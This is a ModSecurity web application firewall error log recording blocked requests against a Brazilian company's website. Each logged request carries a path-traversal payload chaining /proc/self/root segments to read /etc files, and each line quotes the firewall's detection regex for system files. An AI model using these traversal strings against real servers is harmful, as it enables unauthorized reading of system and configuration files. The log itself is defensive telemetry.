[Fri Mar 20 06:26:56.869892 2026] [:error] [pid 7235:tid 140411658000128] [client 74.7.241.31:42428] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0S4PqxLDW4GITHUkTSpAAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:26:57.869626 2026] [:error] [pid 11642:tid 140411666392832] [client 74.7.243.128:36216] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0S4bninkcc-iUj5ApMBwAAA4k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:27:00.093279 2026] [:error] [pid 9818:tid 140411733534464] [client 74.7.243.128:36224] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0S5F1pVZ5mVmJwsFMdbAAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:27:00.223419 2026] [:error] [pid 10189:tid 140411649607424] [client 74.7.241.31:59848] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0S5DJ3M9BSuKP7CAYE3gAAAIs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:27:01.407353 2026] [:error] [pid 10189:tid 140411733534464] [client 74.7.243.128:54752] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0S5TJ3M9BSuKP7CAYE4QAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:27:17.220923 2026] [:error] [pid 11167:tid 140411574073088] [client 74.7.243.128:54766] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0S9fHIg5MgXLBnicPnHAAAAdQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:27:18.558429 2026] [:error] [pid 9818:tid 140411674785536] [client 74.7.243.128:42768] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0S9l1pVZ5mVmJwsFMddwAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:27:21.005663 2026] [:error] [pid 10189:tid 140411733534464] [client 74.7.243.128:39558] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0S-TJ3M9BSuKP7CAYE7gAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:27:22.294951 2026] [:error] [pid 11642:tid 140411624429312] [client 74.7.243.128:39572] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0S-rninkcc-iUj5ApMKQAAA44"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:27:23.451578 2026] [:error] [pid 11642:tid 140411733534464] [client 74.7.243.128:39586] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0S-7ninkcc-iUj5ApMMAAAA4E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:27:24.749576 2026] [:error] [pid 9818:tid 140411708356352] [client 74.7.243.128:39602] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0S_F1pVZ5mVmJwsFMdegAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:27:26.183925 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.243.128:39606] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0S_da6ubjKNq_cu4bAKgAAA0k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:27:27.336586 2026] [:error] [pid 11642:tid 140411658000128] [client 74.7.241.31:59862] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0S_7ninkcc-iUj5ApMMwAAA4o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:27:27.642933 2026] [:error] [pid 31215:tid 140411649607424] [client 74.7.243.128:39618] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0S_wF0L0L-SsrnPo5VOAAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:27:28.644609 2026] [:error] [pid 21219:tid 140411708356352] [client 74.7.241.31:44948] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TAPXLqtnMIWvjpaKHvQAAAoQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:27:30.206039 2026] [:error] [pid 11167:tid 140411716749056] [client 74.7.243.128:39630] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TAPHIg5MgXLBnicPnJAAAAcM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:27:30.220618 2026] [:error] [pid 11167:tid 140411607643904] [client 74.7.241.31:44960] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TAfHIg5MgXLBnicPnJgAAAdA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:27:31.599907 2026] [:error] [pid 11167:tid 140411699963648] [client 74.7.241.31:44962] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TA_HIg5MgXLBnicPnKwAAAcU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:27:31.735154 2026] [:error] [pid 7235:tid 140411565680384] [client 74.7.243.128:49992] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TA_qxLDW4GITHUkTSsQAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:27:34.204344 2026] [:error] [pid 21219:tid 140411733534464] [client 74.7.243.128:50008] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TBvXLqtnMIWvjpaKHwQAAAoE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:27:35.032661 2026] [:error] [pid 9818:tid 140411716749056] [client 74.7.241.31:44972] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TB11pVZ5mVmJwsFMdiAAAAEM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:27:36.389828 2026] [:error] [pid 9818:tid 140411658000128] [client 74.7.241.31:44976] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0TCF1pVZ5mVmJwsFMdigAAAEo"], referer: 